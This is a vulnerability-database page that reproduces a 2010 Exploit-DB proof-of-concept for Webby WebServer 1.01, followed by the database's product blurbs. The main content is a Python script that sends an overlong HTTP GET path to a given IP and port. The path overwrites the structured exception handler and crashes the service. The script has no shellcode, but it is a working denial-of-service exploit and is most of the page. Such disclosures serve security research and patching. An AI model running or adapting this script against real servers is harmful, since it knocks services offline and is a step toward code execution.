Lucene search
K

Webby WebServer - Overflow (SEH) (PoC)

🗓️ 25 May 2010 00:00:00Reported by m-1-k-3Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Webby WebServer - Overflow (SEH) (PoC) SEH overwritten contact: [email protected] http://www.s3cur1ty.de http://www.shareware.de/webby-webserver/ Version 1.01 Autor Timo Gaik Lizenzart Freeware Plattformen Win XP, Win 98, Win ME Letztes Update 19.10.2004 Dateigroesse 701 K

Code
#!/usr/bin/python

##POC details:
##
##SEH overwritten
##
##contact: 	[email protected]
##		http://www.s3cur1ty.de

##App detail:
##
#http://www.shareware.de/webby-webserver/
#Version		1.01
#Autor 		Timo Gaik
#Lizenzart	Freeware
#Plattformen	Win XP, Win 98, Win ME
#Letztes Update	19.10.2004
#Dateigroesse	701 KB

import socket
import sys
import os.path
import time

if len(sys.argv) < 2:
	print "Usage: webby.py <IP-Adr> <port>"
	sys.exit(0)

ips = sys.argv[1]
port = int(sys.argv[2])

string = "A"*790
string += "\x90"*4	
string += "\x42"*105		

method = "GET"
print "starting POC for:", ips
print ""

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
	connect=s.connect((ips, port))
except:
	print "no connection possible"
	sys.exit(1)

payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'

print "\r\nsending payload"
print "\n\rusing methode %s with buffersize of: %s" % (method,str(len(string)))
print "..."

print payload
s.send(payload)
print "finished kicking method %s with payload %s" % (method,payload)
print "... the service should be crashed ... check SEH"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation